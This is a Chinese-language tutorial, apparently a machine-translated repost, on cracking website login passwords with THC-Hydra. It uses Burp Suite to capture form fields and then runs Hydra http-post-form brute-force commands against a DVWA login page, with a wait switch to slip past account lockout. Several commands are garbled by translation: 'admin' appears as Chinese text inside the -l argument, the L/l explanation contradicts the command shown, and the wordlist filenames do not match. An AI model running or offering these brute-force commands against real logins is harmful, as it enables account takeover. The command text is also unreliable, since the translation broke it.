如何使用THC-Hydra破解网站登录密码
这期内容当中小编将会给大家带来有关如何使用THC-Hydra破解网站登录密码,文章内容丰富且以专业的角度为大家分析和叙述,阅读完这篇文章希望大家可以有所收获。
步骤1:打开THC-Hydra
步骤2:获取Web表单参数
网站的IP地址
网址
表格类型
包含用户名的字段
包含密码的字段
失败讯息
如果是还没获取,继续下一步
步骤3:使用Burp Suite获取参数
我们需要在Burp Suite上启用代理,最后,我们需要配置IceWeasel Web浏览器以使用代理。我们可以转到"编辑"->"首选项"->"高级"->"网络"->"设置"以打开"连接设置",如下所示。在那里,通过在HTTP Proxy字段中键入127.0.0.1 ,在Port字段中键入8080,并在底部的No Proxy for字段中删除任何信息,将IceWeasel配置为使用127.0.0.1端口8080作为代理。另外,选择"将此代理服务器用于所有协议"按钮。
步骤4:获取登录参数
现在,让我们尝试使用我的用户名OTW和密码OTW登录。当我这样做时,BurpSuite会截获该请求并向我们显示THC-Hydra Web表单破解所需的关键字段。
步骤5:将参数放入您的THC Hydra命令
现在,有了参数,我们可以将它们放入THC-Hydra命令中。语法如下所示:
kali> hydra -L <用户名列表> -p <密码列表>
因此,根据我们从Burp Suite收集的信息,我们的命令应如下所示:
kali> hydra -L <单词列表> -P <密码列表>
192.168.1.101 http-post-form" /dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:登录失败"
需要注意的几件事。首先,如果要使用用户名列表,则使用大写字母" L";如果要破解那里提供的一个用户名,则使用小写字母" l"。在这种情况下,我将使用小写的" l",因为我只会尝试破解" admin"密码。
步骤6:选择一个破解词单
现在,我们需要选择一个单词表。与任何字典攻击一样,单词表是关键。您可以使用由Crunch of CeWL制作的自定义单词,但是Kali内置了许多单词列表。要查看所有单词列表,只需键入:
kali > locate wordlist
此外,还有许多在线网站,这些网站的单词表最大可以达到100 GB!明智地选择,我的黑客会创新。在这种情况下,我将在以下位置使用少于1000个单词的内置单词列表:
/usr/share/dirb/wordlists/short.txt
步骤7:构建命令
kali> hydra -l管理员-P /usr/share/dirb/wordlists/small.txt 192.168.1.101 http-post-form" /dvwa/login.php:username=^USER^&password=^PASS^&Login=登录:登录失败" -V
步骤8:让她飞!
现在,让她飞!由于我们使用了-V开关,因此THC-Hydra将向我们展示所有尝试。
几分钟后,Hydra会返回我们的Web应用程序的密码。成功!
在Web表单中成功使用它的关键是确定表单对登录失败与成功登录的不同响应方式。在上面的示例中,我们确定了失败的登录消息,但是我们可以确定成功的消息并使用了它。要使用成功消息,我们将失败登录消息替换为" S = successful message",例如:
kali> hydra -l管理员-P /usr/share/dirb/wordlists/small.txt 192.168.1.101 http-post-form" /dvwa/login.php:username=^USER^&password=^PASS^&S=成功消息" -V
还有
另外,某些Web服务器会注意到许多快速失败的登录尝试并锁定了您。在这种情况下,您将需要在THC-Hydra中使用等待功能。这将在两次尝试之间添加一个等待时间,以免触发锁定。您可以通过-w开关使用此功能,因此我们通过编写以下命令来修改命令以在两次尝试之间等待10秒:
kali> hydra -l管理员-P /usr/share/dirb/wordlists/small.txt 192.168.1.101 http-post-form" /dvwa/login.php:username=^USER^&password=^PASS^&Login=登录:登录失败" -w 10 -V
上述就是小编为大家分享的如何使用THC-Hydra破解网站登录密码了,如果刚好有类似的疑惑,不妨参照上述分析进行理解。如果想知道更多相关知识,欢迎关注行业资讯频道。